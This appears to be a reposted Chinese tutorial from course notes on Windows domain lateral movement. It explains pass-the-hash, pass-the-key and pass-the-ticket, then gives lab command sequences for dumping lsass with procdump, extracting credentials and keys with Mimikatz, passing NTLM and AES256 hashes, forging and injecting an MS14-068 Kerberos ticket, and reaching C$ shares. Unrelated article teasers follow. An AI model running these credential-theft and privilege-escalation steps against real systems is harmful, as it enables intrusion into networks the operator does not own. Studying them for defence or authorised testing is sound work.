内网安全:横向传递攻击(PTH || PTK || PTT 哈希票据传递)

news2024/10/6 12:34:55

内网安全:横向传递攻击.

横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.


目录:

内网安全:横向传递攻击.

知识点补充:

(1)PTH:利用 lm 或 ntlm 的值进行的渗透测试

(2)PTK:利用的 ekeys aes256 进行的渗透测试

(3)PTT:利用的票据凭证 TGT 进行的渗透测试

Procdump+Mimikatz 配合获取目标主机密码:

PTH 传递( Mimikatz )

PTK 传递( Mimikatz )

PTT 传递( MS14--068 )


知识点补充:

(1)PTH:利用 lm 或 ntlm 的值进行的渗透测试
(windows系统LM Hash及NTIM Hash加密算法,个人系统在windows vista后服务器系统在windows 2003以后,认证方式均为NTIM Hash.)

(2)PTK:利用的 ekeys aes256 进行的渗透测试

(3)PTT:利用的票据凭证 TGT 进行的渗透测试


PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 
访问远程主机或服务,而不用提供明文密码.

总结:KB2871997 补丁后的影响
(1)PTH:没打补丁用户都可以连接,打了补丁只能 administrator 连接
(2)PTK:打了补丁才能用户都可以连接,采用 aes256 连接 


PTT 攻击的部分就不是简单的 NTLM 认证了,它是利用 Kerberos 协议进行攻击的,这里就介绍三种常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接.

MS14-068 基于漏洞:Golden ticket(黄金票据),SILVER ticket(白银票据)
其中Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术.

MS14-068 造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780



Procdump+Mimikatz 配合获取目标主机密码:

下载procdump工具:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

下载Mimikatz工具:https://github.com/gentilkiwi/mimikatz/releases
想方法把 procdump 上传在目标主机上.
然后执行这个命令,生成一个 lsass.dmp 文件.(再把他下载在我们主机上进行分析)

procdump -accepteula -ma lsass.exe lsass.dmp

在 mimikatz 上执行:

(1)privilege::debug

(2)sekurlsa::minidump lsass.dmp

(3)sekurlsa::logonPasswords full

PTK:采用是 aes256 密文,那 aes256 密文怎么获取的:(再在 mimikatz 上执行)


sekurlsa::ekeys


PTH 传递( Mimikatz )

PTH ntlm 传递.(在 Mimikatz 上执行)

sekurlsa::pth /user:administrator /domain:god /ntlm:209c6174da490caeb422f3fa5a7ae634

新开出来一个cmd窗口:在里面连接(随机的攻击,所以你也不知道是哪个IP地址): die //要连接的IP地址\C$ 

sekurlsa::pth /user:用户名 /domain:域名 /ntlm:域里面的密文密码.(域)



sekurlsa::pth /user:administrator /domain:workgroup /ntlm:209c6174da490caeb422f3fa5a7ae634

新开出来一个cmd窗口:在里面连接(随机的攻击,所以你也不知道是哪个IP地址): die //要连接的IP地址\C$ 

sekurlsa::pth /user:用户名 /domain:工作组 /ntlm:密文密码.(组)


PTK 传递( Mimikatz )

PTK aes256 传递:(在 Mimikatz 上执行)

sekurlsa::pth /user:administrator /domain:workgroup /aes256:4d3963f9bca16812119a7784a5bae5fcc9f5ba35eb769a89cdaba067fddf7335

新开出来一个cmd窗口:在里面连接(随机的攻击,所以你也不知道是哪个IP地址): die //要连接的IP地址\C$ 


PTT 传递( MS14--068 

第一种利用漏洞:(MS14-068 powershell 执行)
(能实现普通用户直接获取域控 system 权限)

(1)whoami/user                // 查看当前SID地址

(2)利用 ms14-068 生成 TGT 数据:

ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码

MS14-068.exe -u win2016@vnlntarget.com -s S-1-5-21-2387719572-2208999834-2475545985-500 -d 10.0.10.110 -p Admin#123
(3)kerberos::purge            //(mimikatz中)清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造

(4)kerberos::list             //(mimikatz中)查看当前机器凭证

(5)kerberos::ptc 票据文件     //(mimikatz中)将票据注入到内存中

(6)票据注入内存:

mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit

(7)查看凭证列表 klist

(8)利用:dir \\192.168.3.21\c$

   

  
  
  
  
学习链接: 第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递_哔哩哔哩_bilibili

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1721468.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Mac电脑pd虚拟机专用windows系统镜像(m1/intel)win10、11镜像文件

入手了Mac电脑后,由于需要用到Windows软件,又嫌安装双系统太复杂,这时候Mac就用到了安装虚拟机,目前最好用的虚拟机是Parallels Desktop,win镜像版本要根据自己的喜好选对,在此提供分别兼容M1和Intel的win1…

WSL2-Ubuntu22.04-配置

WSL2-Ubuntu22.04-配置 准备1. WSL相关命令[^1]2. WSL2-Ubuntu22.04可视化3. WSL2 设置 CUDA4. 设置OpenGL 本文介绍了WSL2的基本使用方法及可视化,着重介绍了GPU和OpenGL的设置。 准备 名称版本windows11wsl2CUDA12.5 1. WSL相关命令1 查看已安装的wsl distribut…

AMS 仿真 ERROR

ERROR (OSSHNL-514): Netlist generation failed because of the errors reported above. The netlist might not have been generated at all, or the generated netlist could be corrupt. Fix the reported errors and regenerate the netlist. 原因:用的incisi…

假设检验学习笔记

1. 假设检验的基本概念 1.1. 原假设(零假设) 对总体的分布所作的假设用表示,并称为原假设或零假设 在总体分布类型已知的情况下,仅仅涉及总体分布中未知参数的统计假设,称为参数假设 在总体分布类型未知的情况下&#…

Solidity学习-投票合约示例

以下的合约有一些复杂,但展示了很多Solidity的语言特性。它实现了一个投票合约。 当然,电子投票的主要问题是如何将投票权分配给正确的人员以及如何防止被操纵。 我们不会在这里解决所有的问题,但至少我们会展示如何进行委托投票,…

解决安装 WP Super Cache 插件提示 Advanced-Cache.Php 是另一个插件创建的

昨天晚上一个站长求助明月,说是安装 WP Super Cache 插件的时候提示 advanced-cache.php 被占用了,无法完成安装,收到截图看了才明白原来提示的是“advanced-cache.php 文件,由另一个插件或者系统管理员创建的”,如下图…

【AI界的狼人杀】人工智能“反图灵测试”实验

5月28日, AI Power Users、Unity 独立开发者:Tore Knabe 在其社交平台发布了一则名为《Reverse Turing Test Experiment with AIs》的视频,立马引发了热议。 视频中共出现了五位主要角色,“他们”分别是:亚里士多德&am…

Keil 5恢复默认布局,左边状态栏

第一步,点击windows: 第二步,点击reset view to default: 第三步,点击reset即可:

狗狗的最爱?揭秘福派斯鸭肉梨狗粮的魔力!

福派斯鸭肉梨全价狗粮之所以能够在宠物食品市场中脱颖而出,并赢得广大宠物主人的一致好评和青睐,主要归功于其科学配比且富含营养价值的独特配方,尤其是在狗狗去泪痕这块的效果显著。这款狗粮以优质鸭肉为主要成分,鸭肉含有丰富的…

Java内存模型----JMM

Java内存模型 1. 前言2. 主内存与工作内存3. JMM解决什么问题?4. JMM内存交互5. Happens-Before1. 程序的顺序性规则2. volatile 变量规则3. 管程中锁的规则4. 线程启动规则5. 线程join规则6. 其他规则 1. 前言 内存模型这个概念。我们可以理解为: 在特定…

springboot基础及上传组件封装

简介 本文主要以文件上传为demo,介绍了一些 springboot web 开发的入门的技术栈。 对应刚接触 springboot 的可以参考下。 主要包括文件md5比对、生成图片缩略图、数据库迁移、文件记录持久化、请求全局异常处理等功能。 准备工作 在 idea 中创建项目&#xff…

PPP认证两种:PAP和CHAP,两次握手和三次握手

CHAP(Challenge-Handshake Authentication Protocol,质询握手认证协议)的设计理念是增强网络认证过程的安全性。在CHAP的三次握手过程中,不直接传送用户的明文密码,以此来提高安全性,具体步骤如下&#xff…

社交媒体数据恢复:QQ空间

本教程将指导您如何恢复QQ空间中的说说、日志和照片等内容。请注意,本教程不涉及推荐任何数据恢复软件。 一、恢复QQ空间说说 登录您的QQ账号,并进入QQ空间。点击“日志”选项,进入空间日志页面。在空间日志页面,您会看到一个“…

MyBatis源码分析--02:SqlSession建立过程

我们再来看看MyBatis使用流程: InputStream inputStream Resources.getResourceAsStream("myBatis_config.xml"); SqlSessionFactory sqlSessionFactory new SqlSessionFactoryBuilder().build(inputStream); SqlSession session sqlSessionFactory.op…

【Rust日报】关于在其它语言中(特别是新语言中)能否直接调用Rust现有生态的研究...

关于在其它语言中(特别是新语言中)能否直接调用Rust现有生态的研究 直接调用,也就是不用写FFI绑定库。这篇文章讨论了其中的一些目前的困难,可以操作的一些方法。 本篇是第一篇:https://verdagon.dev/blog/exploring-s…

数学建模 —— 插值与拟合(1)

一、matlab画图 1.1 plot(二维图形) plot(x) —— 缺省自变量绘图格式 plot(x,y) —— 基本格式,以y(x)的函数关系作出直角坐标图,如果y为nm的矩阵,则以x为自变量,作出m条曲线 plot(x1,y1,x2,y2,…,xn,…

Lesson6--排序(初级数据结构完结篇)

【本节目标】 1. 排序的概念及其运用 2. 常见排序算法的实现 3. 排序算法复杂度及稳定性分析 1.排序的概念及其运用 1.1排序的概念 排序 :所谓排序,就是使一串记录,按照其中的某个或某些关键字的大小,递增或递减的排列起来…

GPT LoRA 大模型微调,生成猫耳娘

往期热门专栏回顾 专栏描述Java项目实战介绍Java组件安装、使用;手写框架等Aws服务器实战Aws Linux服务器上操作nginx、git、JDK、VueJava微服务实战Java 微服务实战,Spring Cloud Netflix套件、Spring Cloud Alibaba套件、Seata、gateway、shadingjdbc…

MACOS安装 vue 抱错解决方法npm ERR! code EACCESnpm ERR! syscall mkdirnpm ERR!

问题 在使用脚手架 vue-cli 创建 vue 工程的时候存在权限不足的情况下,报错; npm error code EACCES npm error syscall open npm error path /Users/ npm ERR! code EACCESnpm ERR! syscall mkdirnpm ERR! 解决方案: sudo npm cache cl…

什么是最好的手机数据恢复软件?6 款手机数据恢复软件 [2024 年更新]

什么是最好的手机数据恢复软件?在这篇文章中,您将了解 6 款最好的免费手机数据恢复软件,并学习如何恢复数据的完整指南。 最好的手机数据恢复软件是什么? 手机数据恢复软件是恢复智能手机中丢失或删除的文件、消息、照片和其他宝…